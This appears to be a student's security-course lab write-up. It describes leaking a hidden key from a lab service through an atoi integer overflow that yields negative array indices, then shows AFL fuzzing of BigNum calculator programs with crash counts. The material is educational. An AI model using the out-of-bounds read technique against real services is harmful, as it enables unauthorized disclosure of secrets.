## Part 1
**The URL found:
[https://cs.adelaide.edu.au/~yval/SP18/assignment2.pdf!](https://cs.adelaide.edu.au/~yval/SP18/assignment2.pdf)
### Step 1 get MLEN
This step is easy, When i input `54`, it outputs `Index 54 out of bounds`, but it can outputs the bytes at
message[53]. In this way, I know `MLEN = 54`.
### Step 2 get message
This step is also easy, I just input 0 to 53 and to the the bytes of `message` array .
## Step 3 get key
This step is very challenging.
I make use of the integer overflow vulnerability of `atoi` function.
“`
int i = atoi(inbuf);
“`
I input `4294967295` ($2^{32}-1$ ) which lead to `i = -1`, `4294967294` to get `i = -2` and so on.
This make the program outputs Bytes at message[-1], message[-2], ……
The address of array `key` is smaller than `message`. Thus, message[-1], message[-2]… may have the bytes of `key` array.
I get the bytes of message[-1], message[-2], ……
And observe that from message[-1] to message[-10] are all 0. But from message[-10], the content is not 0.
Thus, I guess message[-11] is key[53], message[-2] is key[52], …. message[-64] is key[0]
### Step 4 compute the URL
Since I get the `message` and `key`, then the byte of URL is the xor of corresponding byte of message and key.
Under part-1 directory, `results.txt` is the contents of `message` and `key` got through telnet. `compute.py` is used to compute the url using `message` and `key`.
## Part 3
I use `american fuzzy lop ` tool to fuzz the calc software of BigNum-2, BigNum-4 and BigNum-5.
The following is the steps to fuzz BigNum-2, the steps for the other two are the same.
### Step 1
Modify the makefile to use `afl-clang`
“`
main: main.c bn.c
../afl-2.52b/afl-clang –std=gnu99 -O2 -Wall -o calc main.c bn.c
“`
### Step 2
Compile using the updated makefile
“`
Admin@BigNum-2 $make
gcc -c bn.c -o bignum.o -Wall
ar -rcs libbn.a bignum.o
../afl-2.52b/afl-clang –std=gnu99 -O2 -Wall -o calc main.c bn.c
afl-cc 2.52b by
afl-as 2.52b by
[+] Instrumented 63 locations (64-bit, non-hardened mode, ratio 100%).
afl-as 2.52b by
[+] Instrumented 174 locations (64-bit, non-hardened mode, ratio 100%).
“`
### Step 3
Create a new directory `test_cases` under `part2/BigNum-2` and add the test input files.
### Step 4
Using following command to start the testing. This command tells the fuzzer to use test input in the director ./test_cases/ and store the results in `find`. `find/crashes` and `find/hangs` stores the inputs that cause the software to crash and hang.
“`
../afl-2.52b/afl-fuzz -i ./test_cases/ -o find ./calc
“`
### Bugs found summary
I successfully use the too to find the test inputs that cause the software to crash or hang for all 3 versions of solution. `part-3/BigNum-*/find/crashes` stores the inputs that cause the software to crash and `part-3/BigNum-*/find/hangs` stores the inputs that cause the software to hang.
| solution | run time | **uniq crashes** | **uniq hangs** |
| ——– | ——————— | —————- | ————– |
| BigNum-2 | 7 hrs, 16 min, 41 sec | 4 | 1 |
| BigNum-4 | 3 hrs, 1 min, 26 sec | 83 | 0 |
| BigNum-5 | 7 hrs, 11 min, 14 sec | 51 | 2 |
### Screenshots
![](2.png)
![](3.png)
![](4.png)
| BigNum-2 | BigNum-4 | BigNum-5 |
| ———- | ———- | ———- |
| ![](2.png) | ![](4.png) | ![](5.png) |